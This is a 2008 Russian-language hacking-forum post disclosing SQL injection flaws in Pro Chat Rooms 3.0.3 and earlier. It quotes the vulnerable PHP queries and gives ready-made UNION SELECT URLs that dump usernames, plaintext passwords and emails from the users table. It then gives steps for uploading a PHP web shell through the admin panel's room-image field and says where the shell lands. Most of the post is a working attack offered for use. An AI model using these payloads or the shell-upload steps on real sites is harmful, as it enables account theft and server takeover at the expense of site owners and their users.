Чаты Pro Chat Rooms <= 3.0.3 SQL Injection

Discussion in 'Веб-уязвимости' started by ~!DoK_tOR!~, 28 Sep 2008.

  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Офф.сайт: www.prochatrooms.com
    Demo: www.prochatrooms.com/demo.php
    Стоймость: $55 скачать
    Префикс таблиц бд: prochatrooms_
    Табличка: prochatrooms_users
    Клонки: user_name,password,email
    Алгоритм шифрования: в открытом виде
    Админка: http://localhost/admin/

    [SQL Injection]

    Сценарий /[installdir]/profiles/index.php

    уязвимый код:

    PHP:
    $tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'");
    Отсутствует проверка переменной "gud" что позволяет нам провести SQL-Иньекцию.

    Условие: magic_quotes_gpc = Off

    Эксплойт:

    Code:
    http://localhost/[B][COLOR=DarkOrange][installdir][/COLOR][/B]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
    Сценарий /[installdir]/profiles/admin.php

    уязвимый код:

    PHP:
    $tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'");
    Баг оналогичен предыдущему.

    Условие: magic_quotes_gpc = Off

    Эксплойт:

    Code:
    http://localhost/[B][COLOR=DarkOrange][installdir][/COLOR][/B]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
    [Шелл]

    Заходим в админку -> создаём новую комнату (http://localhost/[installdir]/admin/index.php?action=rooms) -> Create New Room

    Room name: пишем название комнаты
    Password: пароль на комнату
    Description: описание
    Image*: заливаем наш шелл с расширением .php

    Шелл будет тут:

    http://localhost/[installdir]/backgrounds/shell.php


    http://milw0rm.com/exploits/6612 ​

    (c) ~!DoK_tOR!~
     
    #1 ~!DoK_tOR!~, 28 Sep 2008
    Last edited: 29 Sep 2008